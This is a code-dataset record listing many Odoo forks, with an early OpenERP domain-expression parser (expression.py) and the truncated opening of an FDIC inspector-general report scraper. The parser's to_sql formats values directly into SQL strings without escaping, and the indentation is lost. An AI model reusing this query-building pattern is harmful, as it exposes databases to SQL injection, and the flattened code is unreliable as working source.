n/odoo,charbeljc/OCB,damdam-s/OpenUpgrade,dalegregory/odoo,Danisan/odoo-1,bplancher/odoo,SerpentCS/odoo,ApuliaSoftware/odoo,stonegithubs/odoo,osvalr/odoo,funkring/fdoo,inspyration/odoo,ihsanudin/odoo,fuselock/odoo,elmerdpadilla/iv,apocalypsebg/odoo,grap/OCB,cpyou/odoo,JGarcia-Panach/odoo,apanju/GMIO_Odoo,JGarcia-Panach/odoo,nexiles/odoo,ApuliaSoftware/odoo,nhomar/odoo-mirror,glovebx/odoo,savoirfairelinux/OpenUpgrade,incaser/odoo-odoo,incaser/odoo-odoo,Ernesto99/odoo,goliveirab/odoo,ingadhoc/odoo,optima-ict/odoo,xujb/odoo,BT-fgarbely/odoo,idncom/odoo,kittiu/odoo,luiseduardohdbackup/odoo,zchking/odoo,colinnewell/odoo,ramadhane/odoo,sebalix/OpenUpgrade,glovebx/odoo,dalegregory/odoo,VielSoft/odoo,rdeheele/odoo,andreparames/odoo,apanju/odoo,sergio-incaser/odoo,kifcaliph/odoo,matrixise/odoo,addition-it-solutions/project-all,gorjuce/odoo,OSSESAC/odoopubarquiluz,VitalPet/odoo,codekaki/odoo,ojengwa/odoo,minhtuancn/odoo,draugiskisprendimai/odoo,jiangzhixiao/odoo,stonegithubs/odoo,omprakasha/odoo,ygol/odoo,jesramirez/odoo,codekaki/odoo,jeasoft/odoo,ApuliaSoftware/odoo,FlorianLudwig/odoo,joariasl/odoo,ingadhoc/odoo,goliveirab/odoo,bobisme/odoo,gdgellatly/OCB1,KontorConsulting/odoo,christophlsa/odoo,luiseduardohdbackup/odoo,blaggacao/OpenUpgrade,fgesora/odoo,makinacorpus/odoo,fdvarela/odoo8,sergio-incaser/odoo,gsmartway/odoo,pplatek/odoo,arthru/OpenUpgrade,VitalPet/odoo,stonegithubs/odoo,provaleks/o8,simongoffin/website_version,spadae22/odoo,tarzan0820/odoo,waytai/odoo,savoirfairelinux/OpenUpgrade,guewen/OpenUpgrade,havt/odoo,KontorConsulting/odoo,fevxie/odoo,gvb/odoo,simongoffin/website_version,Adel-Magebinary/odoo,kifcaliph/odoo,srimai/odoo,mszewczy/odoo,OpenUpgrade-dev/OpenUpgrade,odootr/odoo,zchking/odoo,addition-it-solutions/project-all,dsfsdgsbngfggb/odoo,draugiskisprendimai/odoo,nuncjo/odoo,GauravSahu/odoo,nuncjo/odoo,hubsaysnuaa/odoo,joariasl/odoo,hoatle/odoo,rgeleta/odoo,bakhtout/odoo-educ,BT-rmartin/odoo,OpusVL/odoo,dsfsdgsbngfggb/odoo,fjbatresv/odoo,demon-ru/iml-crm,microcom/odoo,mmbtba/odoo,frouty/odoogoeen,chiragjogi/odoo,jeasoft/odoo,srsman/odoo,ramitalat/odoo,Eric-Zhong/odoo,tarzan0820/odoo,grap/OCB,microcom/odoo,salaria/odoo,CatsAndDogsbvba/odoo,PongPi/isl-odoo,grap/OpenUpgrade,markeTIC/OCB,savoirfairelinux/odoo,lightcn/odoo,lombritz/odoo,Ernesto99/odoo,bakhtout/odoo-educ,rahuldhote/odoo,podemos-info/odoo,0k/odoo,ihsanudin/odoo,hassoon3/odoo,xujb/odoo,havt/odoo,ehirt/odoo,apocalypsebg/odoo,csrocha/OpenUpgrade,laslabs/odoo,srimai/odoo,deKupini/erp,papouso/odoo,apanju/odoo,stephen144/odoo,hoatle/odoo,optima-ict/odoo,srsman/odoo,guewen/OpenUpgrade,Codefans-fan/odoo,leoliujie/odoo,gdgellatly/OCB1,JGarcia-Panach/odoo,CatsAndDogsbvba/odoo,Codefans-fan/odoo,juanalfonsopr/odoo,hoatle/odoo,JCA-Developpement/Odoo,bplancher/odoo,jiachenning/odoo,Eric-Zhong/odoo,ramitalat/odoo,mkieszek/odoo,Ernesto99/odoo,matrixise/odoo,SAM-IT-SA/odoo,Noviat/odoo,gorjuce/odoo,sinbazhou/odoo,ShineFan/odoo,omprakasha/odoo,RafaelTorrealba/odoo,BT-astauder/odoo,Adel-Magebinary/odoo,luiseduardohdbackup/odoo,highco-groupe/odoo,Ernesto99/odoo,jusdng/odoo,sv-dev1/odoo,luiseduardohdbackup/odoo,Drooids/odoo,Nowheresly/odoo,collex100/odoo,OpenUpgrade/OpenUpgrade,abenzbiria/clients_odoo,camptocamp/ngo-addons-backport,ovnicraft/odoo,oihane/odoo,havt/odoo,pplatek/odoo,spadae22/odoo,ehirt/odoo,poljeff/odoo,gavin-feng/odoo,damdam-s/OpenUpgrade,ccomb/OpenUpgrade,cdrooom/odoo,oliverhr/odoo,gorjuce/odoo,arthru/OpenUpgrade,x111ong/odoo,collex100/odoo,damdam-s/OpenUpgrade,0k/OpenUpgrade,wangjun/odoo,csrocha/OpenUpgrade,lsinfo/odoo,sadleader/odoo,Daniel-CA/odoo,sv-dev1/odoo,Daniel-CA/odoo,lgscofield/odoo,dllsf/odootest,TRESCLOUD/odoopub,bobisme/odoo,alhashash/odoo,datenbetrieb/odoo,demon-ru/iml-crm,Ernesto99/odoo,rgeleta/odoo,Adel-Magebinary/odoo,kifcaliph/odoo,MarcosCommunity/odoo,fevxie/odoo,nhomar/odoo-mirror,jiachenning/odoo,podemos-info/odoo,zchking/odoo,prospwro/odoo,shaufi/odoo,arthru/OpenUpgrade,sergio-incaser/odoo,AuyaJackie/odoo,alqfahad/odoo,csrocha/OpenUpgrade,rowemoore/odoo,oliverhr/odoo,hanicker/odoo,eino-makitalo/odoo,apanju/odoo,storm-computers/odoo,erkrishna9/odoo,incaser/odoo-odoo,charbeljc/OCB,virgree/odoo,srimai/odoo,n0m4dz/odoo,draugiskisprendimai/odoo,diagramsoftware/odoo,shaufi/odoo,OpenUpgrade-dev/OpenUpgrade,slevenhagen/odoo,feroda/odoo,Codefans-fan/odoo,lgscofield/odoo,osvalr/odoo,fossoult/odoo,Nowheresly/odoo,prospwro/odoo,brijeshkesariya/odoo,gvb/odoo,pplatek/odoo,inspyration/odoo,sebalix/OpenUpgrade,sadleader/odoo,CatsAndDogsbvba/odoo,PongPi/isl-odoo,tinkhaven-organization/odoo,Antiun/odoo,lsinfo/odoo,abstract-open-solutions/OCB,lombritz/odoo,doomsterinc/odoo,lsinfo/odoo,spadae22/odoo,incaser/odoo-odoo,0k/OpenUpgrade,zchking/odoo,grap/OpenUpgrade,alexteodor/odoo,Noviat/odoo,grap/OCB,chiragjogi/odoo,goliveirab/odoo,Endika/odoo,Gitlab11/odoo,shaufi/odoo,joshuajan/odoo,cysnake4713/odoo,CatsAndDogsbvba/odoo,juanalfonsopr/odoo,NeovaHealth/odoo,chiragjogi/odoo,Nowheresly/odoo,joshuajan/odoo,markeTIC/OCB,windedge/odoo,tarzan0820/odoo,hanicker/odoo,storm-computers/odoo,windedge/odoo,ingadhoc/odoo,rubencabrera/odoo,juanalfonsopr/odoo,kirca/OpenUpgrade,grap/OpenUpgrade,syci/OCB,VitalPet/odoo,christophlsa/odoo,tinkerthaler/odoo,nuuuboo/odoo,tinkerthaler/odoo,hopeall/odoo,codekaki/odoo,guewen/OpenUpgrade,cedk/odoo,leorochael/odoo,jusdng/odoo,shivam1111/odoo,markeTIC/OCB,OpenUpgrade/OpenUpgrade,CubicERP/odoo,alhashash/odoo,SerpentCS/odoo,hifly/OpenUpgrade,deKupini/erp,dariemp/odoo,thanhacun/odoo,MarcosCommunity/odoo,fossoult/odoo,cloud9UG/odoo,savoirfairelinux/OpenUpgrade,OSSESAC/odoopubarquiluz,oasiswork/odoo,BT-ojossen/odoo,frouty/odoogoeen,bguillot/OpenUpgrade,sergio-incaser/odoo,tarzan0820/odoo,dkubiak789/odoo,dezynetechnologies/odoo,Noviat/odoo,jfpla/odoo,jiangzhixiao/odoo,tangyiyong/odoo,synconics/odoo,slevenhagen/odoo-npg,kybriainfotech/iSocioCRM,hanicker/odoo,papouso/odoo,papouso/odoo,shivam1111/odoo,Drooids/odoo,guerrerocarlos/odoo,nagyistoce/odoo-dev-odoo,odootr/odoo,aviciimaxwell/odoo,factorlibre/OCB,mustafat/odoo-1,microcom/odoo,addition-it-solutions/project-all,ecosoft-odoo/odoo,CopeX/odoo,ojengwa/odoo,sv-dev1/odoo,Endika/OpenUpgrade,0k/odoo,erkrishna9/odoo,mlaitinen/odoo,hip-odoo/odoo,ehirt/odoo,savoirfairelinux/OpenUpgrade,BT-rmartin/odoo,Adel-Magebinary/odoo,sinbazhou/odoo,JonathanStein/odoo,steedos/odoo,BT-rmartin/odoo,sv-dev1/odoo,doomsterinc/odoo,RafaelTorrealba/odoo,alexteodor/odoo,mlaitinen/odoo,mszewczy/odoo,janocat/odoo,CopeX/odoo,Daniel-CA/odoo,srimai/odoo,mszewczy/odoo,oliverhr/odoo,fuhongliang/odoo,dkubiak789/odoo,guerrerocarlos/odoo,rowemoore/odoo,mmbtba/odoo,JonathanStein/odoo,fjbatresv/odoo,GauravSahu/odoo,stonegithubs/odoo,cloud9UG/odoo,gdgellatly/OCB1,shaufi/odoo,Noviat/odoo,bguillot/OpenUpgrade,dgzurita/odoo,patmcb/odoo,ClearCorp-dev/odoo,pedrobaeza/OpenUpgrade,xzYue/odoo,cysnake4713/odoo,elmerdpadilla/iv,fevxie/odoo,Ichag/odoo,xujb/odoo,JCA-Developpement/Odoo,christophlsa/odoo,rahuldhote/odoo,KontorConsulting/odoo,omprakasha/odoo,tangyiyong/odoo,OpenPymeMx/OCB,leoliujie/odoo,nagyistoce/odoo-dev-odoo,stonegithubs/odoo,shaufi10/odoo,GauravSahu/odoo,hifly/OpenUpgrade,luistorresm/odoo,poljeff/odoo,lombritz/odoo,gsmartway/odoo,n0m4dz/odoo,Endika/OpenUpgrade,oasiswork/odoo,ShineFan/odoo,joshuajan/odoo,agrista/odoo-saas,ApuliaSoftware/odoo,QianBIG/odoo,datenbetrieb/odoo,ehirt/odoo,nhomar/odoo,ChanduERP/odoo,gdgellatly/OCB1,OpenUpgrade/OpenUpgrade,elmerdpadilla/iv,sebalix/OpenUpgrade,makinacorpus/odoo,pedrobaeza/OpenUpgrade,makinacorpus/odoo,abstract-open-solutions/OCB,kittiu/odoo,cedk/odoo,Gitlab11/odoo,abdellatifkarroum/odoo,idncom/odoo,sv-dev1/odoo,shingonoide/odoo,xujb/odoo,sadleader/odoo,Drooids/odoo,hbrunn/OpenUpgrade,oasiswork/odoo,aviciimaxwell/odoo,wangjun/odoo,alqfahad/odoo,csrocha/OpenUpgrade,OpenPymeMx/OCB,thanhacun/odoo,QianBIG/odoo,tvibliani/odoo,blaggacao/OpenUpgrade,collex100/odoo,Maspear/odoo,credativUK/OCB,tangyiyong/odoo,PongPi/isl-odoo,BT-ojossen/odoo,RafaelTorrealba/odoo,mmbtba/odoo,slevenhagen/odoo-npg,ChanduERP/odoo,CatsAndDogsbvba/odoo,wangjun/odoo,jesramirez/odoo,lightcn/odoo,Endika/odoo,Endika/odoo,idncom/odoo,factorlibre/OCB,slevenhagen/odoo-npg,funkring/fdoo,credativUK/OCB,guerrerocarlos/odoo,rgeleta/odoo,bkirui/odoo,mustafat/odoo-1,ingadhoc/odoo,tvtsoft/odoo8,synconics/odoo,ChanduERP/odoo,OpenUpgrade-dev/OpenUpgrade,CopeX/odoo,dariemp/odoo,ThinkOpen-Solutions/odoo,draugiskisprendimai/odoo,pedrobaeza/odoo,Nowheresly/odoo,ubic135/odoo-design,xzYue/odoo,avoinsystems/odoo,mszewczy/odoo,gvb/odoo,rubencabrera/odoo,OpenPymeMx/OCB,apanju/odoo,ecosoft-odoo/odoo,hip-odoo/odoo,hubsaysnuaa/odoo,vnsofthe/odoo,cedk/odoo,ThinkOpen-Solutions/odoo,storm-computers/odoo,mustafat/odoo-1,dezynetechnologies/odoo,JCA-Developpement/Odoo,synconics/odoo,salaria/odoo,OSSESAC/odoopubarquiluz,virgree/odoo,ujjwalwahi/odoo,alexcuellar/odoo,fossoult/odoo,wangjun/odoo,synconics/odoo,hbrunn/OpenUpgrade,Nick-OpusVL/odoo,ubic135/odoo-design,datenbetrieb/odoo,goliveirab/odoo,credativUK/OCB,srsman/odoo,gavin-feng/odoo,odoo-turkiye/odoo,cloud9UG/odoo,avoinsystems/odoo,jiachenning/odoo,abstract-open-solutions/OCB,ujjwalwahi/odoo,Bachaco-ve/odoo,damdam-s/OpenUpgrade,fossoult/odoo,frouty/odoo_oph,ClearCorp-dev/odoo,stephen144/odoo,hip-odoo/odoo,funkring/fdoo,eino-makitalo/odoo,dalegregory/odoo,minhtuancn/odoo,oihane/odoo,fjbatresv/odoo,cpyou/odoo,tvibliani/odoo,SAM-IT-SA/odoo,tvtsoft/odoo8,vrenaville/ngo-addons-backport,rubencabrera/odoo,elmerdpadilla/iv,apanju/GMIO_Odoo,dllsf/odootest,dsfsdgsbngfggb/odoo,fgesora/odoo,draugiskisprendimai/odoo,ihsanudin/odoo,Adel-Magebinary/odoo,provaleks/o8,Danisan/odoo-1,jpshort/odoo,dgzurita/odoo,vnsofthe/odoo,waytai/odoo,poljeff/odoo,VitalPet/odoo,acshan/odoo,NeovaHealth/odoo,cedk/odoo,agrista/odoo-saas,jesramirez/odoo,Nowheresly/odoo,odoo-turkiye/odoo,dgzurita/odoo,grap/OCB,OSSESAC/odoopubarquiluz,Kilhog/odoo,gorjuce/odoo,VielSoft/odoo,florentx/OpenUpgrade,camptocamp/ngo-addons-backport,ubic135/odoo-design,dezynetechnologies/odoo,waytai/odoo,frouty/odoo_oph,realsaiko/odoo,inspyration/odoo,TRESCLOUD/odoopub,ecosoft-odoo/odoo,apocalypsebg/odoo,mszewczy/odoo,hassoon3/odoo,patmcb/odoo,mvaled/OpenUpgrade,jiachenning/odoo,erkrishna9/odoo,hip-odoo/odoo,jaxkodex/odoo,slevenhagen/odoo,numerigraphe/odoo,rgeleta/odoo,lombritz/odoo,AuyaJackie/odoo,omprakasha/odoo,Maspear/odoo,ehirt/odoo,CatsAndDogsbvba/odoo,kirca/OpenUpgrade,simongoffin/website_version,oihane/odoo,spadae22/odoo,xujb/odoo,hubsaysnuaa/odoo,osvalr/odoo,simongoffin/website_version,takis/odoo,rdeheele/odoo,avoinsystems/odoo,dfang/odoo,bplancher/odoo,provaleks/o8,fuhongliang/odoo,Grirrane/odoo,shingonoide/odoo,vrenaville/ngo-addons-backport,leoliujie/odoo,mvaled/OpenUpgrade,Noviat/odoo,MarcosCommunity/odoo,massot/odoo,markeTIC/OCB,datenbetrieb/odoo,frouty/odoogoeen,brijeshkesariya/odoo,bealdav/OpenUpgrade,jolevq/odoopub,takis/odoo,kittiu/odoo,salaria/odoo,0k/OpenUpgrade,pedrobaeza/odoo,fuhongliang/odoo,ThinkOpen-Solutions/odoo,sysadminmatmoz/OCB,fuhongliang/odoo,mszewczy/odoo,shivam1111/odoo,simongoffin/website_version,odoo-turkiye/odoo,hopeall/odoo,papouso/odoo,shaufi10/odoo,kybriainfotech/iSocioCRM,storm-computers/odoo,cysnake4713/odoo,sv-dev1/odoo,stephen144/odoo,lgscofield/odoo,havt/odoo,tvtsoft/odoo8,dfang/odoo,kybriainfotech/iSocioCRM,hifly/OpenUpgrade,SerpentCS/odoo,glovebx/odoo,savoirfairelinux/odoo,0k/OpenUpgrade,salaria/odoo,papouso/odoo,bwrsandman/OpenUpgrade,dalegregory/odoo,Grirrane/odoo,CopeX/odoo,prospwro/odoo,ojengwa/odoo,stonegithubs/odoo,hbrunn/OpenUpgrade,bwrsandman/OpenUpgrade,apanju/GMIO_Odoo,windedge/odoo,jiangzhixiao/odoo,frouty/odoogoeen,dezynetechnologies/odoo,waytai/odoo,bakhtout/odoo-educ,Antiun/odoo,jolevq/odoopub,CubicERP/odoo,JGarcia-Panach/odoo,jaxkodex/odoo,sve-odoo/odoo,Danisan/odoo-1,mustafat/odoo-1,Ichag/odoo,hmen89/odoo,bealdav/OpenUpgrade,hbrunn/OpenUpgrade,srsman/odoo,Ichag/odoo,kybriainfotech/iSocioCRM,rahuldhote/odoo,guerrerocarlos/odoo,cpyou/odoo,diagramsoftware/odoo,colinnewell/odoo,luiseduardohdbackup/odoo,CubicERP/odoo,salaria/odoo,jfpla/odoo,Grirrane/odoo,demon-ru/iml-crm,sebalix/OpenUpgrade,takis/odoo,tvibliani/odoo,RafaelTorrealba/odoo,ecosoft-odoo/odoo,factorlibre/OCB,ihsanudin/odoo,bkirui/odoo,tinkhaven-organization/odoo,hanicker/odoo,oasiswork/odoo,damdam-s/OpenUpgrade,alhashash/odoo,bealdav/OpenUpgrade,Daniel-CA/odoo,aviciimaxwell/odoo,mvaled/OpenUpgrade,alqfahad/odoo,podemos-info/odoo,Kilhog/odoo,QianBIG/odoo,luistorresm/odoo,lightcn/odoo,rowemoore/odoo,dfang/odoo,minhtuancn/odoo,wangjun/odoo,nuuuboo/odoo,shivam1111/odoo,shaufi10/odoo,fgesora/odoo,omprakasha/odoo,NeovaHealth/odoo,bkirui/odoo,fevxie/odoo,highco-groupe/odoo,alhashash/odoo,feroda/odoo,oihane/odoo,stephen144/odoo,NeovaHealth/odoo,savoirfairelinux/odoo,jpshort/odoo,sinbazhou/odoo,syci/OCB,virgree/odoo,alqfahad/odoo,jaxkodex/odoo,minhtuancn/odoo,Drooids/odoo,CubicERP/odoo,apanju/odoo,chiragjogi/odoo,brijeshkesariya/odoo,charbeljc/OCB,gorjuce/odoo,nagyistoce/odoo-dev-odoo,mkieszek/odoo,FlorianLudwig/odoo,mmbtba/odoo,Elico-Corp/odoo_OCB,bakhtout/odoo-educ,deKupini/erp,cdrooom/odoo,fevxie/odoo,jusdng/odoo,hassoon3/odoo,dgzurita/odoo,collex100/odoo,draugiskisprendimai/odoo,odootr/odoo,tinkhaven-organization/odoo,BT-fgarbely/odoo,ccomb/OpenUpgrade,TRESCLOUD/odoopub,fuselock/odoo,idncom/odoo,ujjwalwahi/odoo,SAM-IT-SA/odoo,jaxkodex/odoo,klunwebale/odoo,nagyistoce/odoo-dev-odoo,tvtsoft/odoo8,codekaki/odoo,shingonoide/odoo,bobisme/odoo,havt/odoo,jiachenning/odoo,bobisme/odoo,nuncjo/odoo,mkieszek/odoo,rschnapka/odoo,dkubiak789/odoo,Kilhog/odoo,ubic135/odoo-design,gavin-feng/odoo,ojengwa/odoo,apocalypsebg/odoo,Danisan/odoo-1,FlorianLudwig/odoo,hoatle/odoo,frouty/odoogoeen,lgscofield/odoo,alexcuellar/odoo,blaggacao/OpenUpgrade,charbeljc/OCB,diagramsoftware/odoo,agrista/odoo-saas,omprakasha/odoo,Nick-OpusVL/odoo,Drooids/odoo,laslabs/odoo,patmcb/odoo,ApuliaSoftware/odoo,sinbazhou/odoo,mlaitinen/odoo,patmcb/odoo,luiseduardohdbackup/odoo,gsmartway/odoo,gvb/odoo,mkieszek/odoo,provaleks/o8,jeasoft/odoo,rschnapka/odoo,kifcaliph/odoo,GauravSahu/odoo,jiangzhixiao/odoo,storm-computers/odoo,FlorianLudwig/odoo,AuyaJackie/odoo,diagramsoftware/odoo,lsinfo/odoo,osvalr/odoo,ClearCorp-dev/odoo,mmbtba/odoo,Eric-Zhong/odoo,oihane/odoo,fuselock/odoo,gvb/odoo,JGarcia-Panach/odoo,doomsterinc/odoo,fdvarela/odoo8,tinkerthaler/odoo,pedrobaeza/odoo,matrixise/odoo,Eric-Zhong/odoo,nhomar/odoo,nuuuboo/odoo,jesramirez/odoo,nuncjo/odoo,markeTIC/OCB,slevenhagen/odoo,Daniel-CA/odoo,factorlibre/OCB,kirca/OpenUpgrade,QianBIG/odoo,Elico-Corp/odoo_OCB,rschnapka/odoo,syci/OCB,arthru/OpenUpgrade,juanalfonsopr/odoo,vnsofthe/odoo,Maspear/odoo,tinkhaven-organization/odoo,factorlibre/OCB,slevenhagen/odoo-npg,shaufi/odoo,alexteodor/odoo,kirca/OpenUpgrade,goliveirab/odoo,fossoult/odoo,nhomar/odoo,naousse/odoo,oasiswork/odoo,prospwro/odoo,hubsaysnuaa/odoo,bguillot/OpenUpgrade,sysadminmatmoz/OCB,shaufi10/odoo,thanhacun/odoo,sve-odoo/odoo,laslabs/odoo,nitinitprof/odoo,juanalfonsopr/odoo,Bachaco-ve/odoo,bguillot/OpenUpgrade,NeovaHealth/odoo,janocat/odoo,n0m4dz/odoo,diagramsoftware/odoo,sebalix/OpenUpgrade,CubicERP/odoo,camptocamp/ngo-addons-backport,andreparames/odoo,bealdav/OpenUpgrade,hopeall/odoo,janocat/odoo,hifly/OpenUpgrade,mmbtba/odoo,VielSoft/odoo,dariemp/odoo,sebalix/OpenUpgrade,Maspear/odoo,alexcuellar/odoo,codekaki/odoo,doomsterinc/odoo,Danisan/odoo-1,guewen/OpenUpgrade,optima-ict/odoo,mkieszek/odoo,draugiskisprendimai/odoo,bplancher/odoo,Bachaco-ve/odoo,lsinfo/odoo,Ichag/odoo,cloud9UG/odoo,fossoult/odoo,shivam1111/odoo,luistorresm/odoo,blaggacao/OpenUpgrade,tinkhaven-organization/odoo,ramadhane/odoo,gvb/odoo,aviciimaxwell/odoo,naousse/odoo,numerigraphe/odoo,ChanduERP/odoo,odootr/odoo,bwrsandman/OpenUpgrade,vrenaville/ngo-addons-backport,slevenhagen/odoo,nuncjo/odoo,BT-astauder/odoo,OpenUpgrade-dev/OpenUpgrade,tinkerthaler/odoo,fdvarela/odoo8,mlaitinen/odoo,florentx/OpenUpgrade,bobisme/odoo,acshan/odoo,brijeshkesariya/odoo,massot/odoo,sadleader/odoo,damdam-s/OpenUpgrade,havt/odoo,windedge/odoo,joshuajan/odoo,bakhtout/odoo-educ,gavin-feng/odoo,Ernesto99/odoo,ingadhoc/odoo,Endika/OpenUpgrade,SAM-IT-SA/odoo,matrixise/odoo,credativUK/OCB,guerrerocarlos/odoo,mvaled/OpenUpgrade,avoinsystems/odoo,gdgellatly/OCB1,oliverhr/odoo,mustafat/odoo-1,deKupini/erp,virgree/odoo,numerigraphe/odoo,rschnapka/odoo,odooindia/odoo,tvtsoft/odoo8,VitalPet/odoo,hassoon3/odoo,0k/odoo,slevenhagen/odoo-npg,laslabs/odoo,srsman/odoo,Codefans-fan/odoo,alexteodor/odoo,BT-ojossen/odoo,rdeheele/odoo,brijeshkesariya/odoo,naousse/odoo,incaser/odoo-odoo,ihsanudin/odoo,fuselock/odoo,florian-dacosta/OpenUpgrade,kybriainfotech/iSocioCRM,tinkerthaler/odoo,jesramirez/odoo,factorlibre/OCB,sv-dev1/odoo,osvalr/odoo,massot/odoo,minhtuancn/odoo,slevenhagen/odoo-npg,javierTerry/odoo,VielSoft/odoo,waytai/odoo,bplancher/odoo,savoirfairelinux/odoo,ramitalat/odoo,ovnicraft/odoo,JonathanStein/odoo,provaleks/o8,dgzurita/odoo,kirca/OpenUpgrade,mszewczy/odoo,BT-astauder/odoo,0k/OpenUpgrade,dalegregory/odoo,dezynetechnologies/odoo,jaxkodex/odoo,Eric-Zhong/odoo,colinnewell/odoo,windedge/odoo,numerigraphe/odoo,diagramsoftware/odoo,Maspear/odoo,idncom/odoo,odootr/odoo,ygol/odoo,dkubiak789/odoo,janocat/odoo,steedos/odoo,Adel-Magebinary/odoo,slevenhagen/odoo-npg,odoousers2014/odoo,KontorConsulting/odoo,jeasoft/odoo,SAM-IT-SA/odoo,dezynetechnologies/odoo,ygol/odoo,tarzan0820/odoo,blaggacao/OpenUpgrade,ramadhane/odoo,pplatek/odoo,sebalix/OpenUpgrade,MarcosCommunity/odoo,fgesora/odoo,wangjun/odoo,fuhongliang/odoo,zchking/odoo,ubic135/odoo-design,ingadhoc/odoo,blaggacao/OpenUpgrade,hoatle/odoo,SerpentCS/odoo,eino-makitalo/odoo,srimai/odoo,poljeff/odoo,SerpentCS/odoo,sergio-incaser/odoo,ovnicraft/odoo,massot/odoo,joariasl/odoo,Grirrane/odoo,aviciimaxwell/odoo,windedge/odoo,nitinitprof/odoo,gvb/odoo,ovnicraft/odoo,Nick-OpusVL/odoo,jusdng/odoo,CatsAndDogsbvba/odoo,cedk/odoo,gdgellatly/OCB1,pplatek/odoo,christophlsa/odoo,bguillot/OpenUpgrade,Elico-Corp/odoo_OCB,bkirui/odoo,funkring/fdoo,leorochael/odoo,stonegithubs/odoo,Endika/odoo,rubencabrera/odoo,abdellatifkarroum/odoo,VielSoft/odoo,pedrobaeza/OpenUpgrade,KontorConsulting/odoo,leoliujie/odoo,nexiles/odoo,tangyiyong/odoo,cysnake4713/odoo,numerigraphe/odoo,fgesora/odoo,hmen89/odoo,OpusVL/odoo,Gitlab11/odoo,hubsaysnuaa/odoo,sergio-incaser/odoo,virgree/odoo,cpyou/odoo,nhomar/odoo,florian-dacosta/OpenUpgrade,Drooids/odoo,gsmartway/odoo,ovnicraft/odoo,x111ong/odoo,xujb/odoo,ramitalat/odoo,GauravSahu/odoo,x111ong/odoo,blaggacao/OpenUpgrade,ujjwalwahi/odoo,datenbetrieb/odoo,thanhacun/odoo,oliverhr/odoo,ApuliaSoftware/odoo,csrocha/OpenUpgrade,christophlsa/odoo,odoousers2014/odoo,vnsofthe/odoo,alqfahad/odoo,datenbetrieb/odoo,vnsofthe/odoo,apocalypsebg/odoo,hopeall/odoo,joariasl/odoo,JonathanStein/odoo,lightcn/odoo,leoliujie/odoo,sysadminmatmoz/OCB,Gitlab11/odoo,andreparames/odoo,lgscofield/odoo,savoirfairelinux/OpenUpgrade,havt/odoo,ChanduERP/odoo,camptocamp/ngo-addons-backport,mmbtba/odoo,ThinkOpen-Solutions/odoo,waytai/odoo,nagyistoce/odoo-dev-odoo,jpshort/odoo,nitinitprof/odoo,salaria/odoo,alexcuellar/odoo,bobisme/odoo,vrenaville/ngo-addons-backport,gavin-feng/odoo,florentx/OpenUpgrade,frouty/odoo_oph,syci/OCB,acshan/odoo,funkring/fdoo,dariemp/odoo,Nick-OpusVL/odoo,dgzurita/odoo,dgzurita/odoo,cysnake4713/odoo,waytai/odoo,takis/odoo,tvibliani/odoo,ChanduERP/odoo,frouty/odoogoeen,leorochael/odoo,AuyaJackie/odoo,microcom/odoo,bplancher/odoo,tinkhaven-organization/odoo,nitinitprof/odoo,ujjwalwahi/odoo,dsfsdgsbngfggb/odoo,Bachaco-ve/odoo,gdgellatly/OCB1,PongPi/isl-odoo,x111ong/odoo,ccomb/OpenUpgrade,OpusVL/odoo,gavin-feng/odoo,rowemoore/odoo,oliverhr/odoo,cedk/odoo,thanhacun/odoo,n0m4dz/odoo,dariemp/odoo,apanju/GMIO_Odoo,nagyistoce/odoo-dev-odoo,camptocamp/ngo-addons-backport,slevenhagen/odoo,grap/OpenUpgrade,luistorresm/odoo,hmen89/odoo,abdellatifkarroum/odoo,tinkerthaler/odoo,OSSESAC/odoopubarquiluz,xzYue/odoo,OpenPymeMx/OCB,spadae22/odoo,srsman/odoo,odootr/odoo,ClearCorp-dev/odoo,xzYue/odoo,SAM-IT-SA/odoo,highco-groupe/odoo,vrenaville/ngo-addons-backport,christophlsa/odoo,Nick-OpusVL/odoo,Nowheresly/odoo,erkrishna9/odoo,jolevq/odoopub,podemos-info/odoo,florian-dacosta/OpenUpgrade,odoousers2014/odoo,odooindia/odoo,microcom/odoo,rowemoore/odoo,javierTerry/odoo,odoo-turkiye/odoo,ygol/odoo,highco-groupe/odoo,Codefans-fan/odoo,nuuuboo/odoo,storm-computers/odoo,nuncjo/odoo,minhtuancn/odoo,rubencabrera/odoo,fdvarela/odoo8,jusdng/odoo,credativUK/OCB,incaser/odoo-odoo,bakhtout/odoo-educ,Grirrane/odoo,addition-it-solutions/project-all,optima-ict/odoo,odoousers2014/odoo,brijeshkesariya/odoo,doomsterinc/odoo,Daniel-CA/odoo,demon-ru/iml-crm,nuncjo/odoo,camptocamp/ngo-addons-backport,bwrsandman/OpenUpgrade,TRESCLOUD/odoopub,CopeX/odoo,ovnicraft/odoo,idncom/odoo | bin/tools/expression.py | bin/tools/expression.py | #!/usr/bin/env python
def _is_operator( element ):
return isinstance( element, str ) and element in ['&','|']
def _is_leaf( element ):
return isinstance( element, tuple ) and len( element ) == 3 and element[1] in ['=', '<>', '!=', '<=', '<', '>', '>=', 'like', 'not like', 'ilike', 'not ilike']
def _is_expression( element ):
return isinstance( element, tuple ) and len( element ) > 2 and _is_operator( element[0] )
class expression_leaf( object ):
def __init__(self, operator, left, right ):
self.operator = operator
self.left = left
self.right = right
def parse( self ):
return self
def to_sql( self ):
return "%s %s %s" % ( self.left, self.operator, self.right )
class expression( object ):
def __init__( self, exp ):
if isinstance( exp, tuple ):
if not _is_leaf( exp ) and not _is_operator( exp[0] ):
exp = list( exp )
if isinstance( exp, list ):
if len( exp ) == 1 and _is_leaf( exp[0] ):
exp = exp[0]
else:
if not _is_operator( exp[0][0] ):
exp.insert( 0, '&' )
exp = tuple( exp )
else:
exp = exp[0]
self.exp = exp
self.operator = '&'
self.children = []
def parse( self ):
if _is_leaf( self.exp ):
self.children.append( expression_leaf( self.exp[1], self.exp[0], self.exp[2] ).parse() )
elif _is_expression( self.exp ):
self.operator = self.exp[0]
for element in self.exp[1:]:
if not _is_operator( element ) and not _is_leaf(element):
self.children.append( expression(element).parse() )
else:
if _is_leaf(element):
self.children.append( expression_leaf( element[1], element[0], element[2] ).parse() )
return self
def to_sql( self ):
return "( %s )" % ((" %s " % {'&' : 'AND', '|' : 'OR' }[self.operator]).join([child.to_sql() for child in self.children]))
| agpl-3.0 | Python | |
8a86c1c9bec625b58c2dc4914837b2e3a0ef175c | Add FDIC | lukerosiak/inspectors-general,divergentdave/inspectors-general | inspectors/fdic.py | inspectors/fdic.py | #!/usr/bin/env python
import datetime
import logging
import os
from urllib.parse import urljoin
from bs4 import BeautifulSoup
from utils import utils, inspector
# http://www.fdicoig.gov
# Oldest report: 1998
# options:
# standard since/year options for a year range to fetch from.
#
# Notes for IG's web team:
#
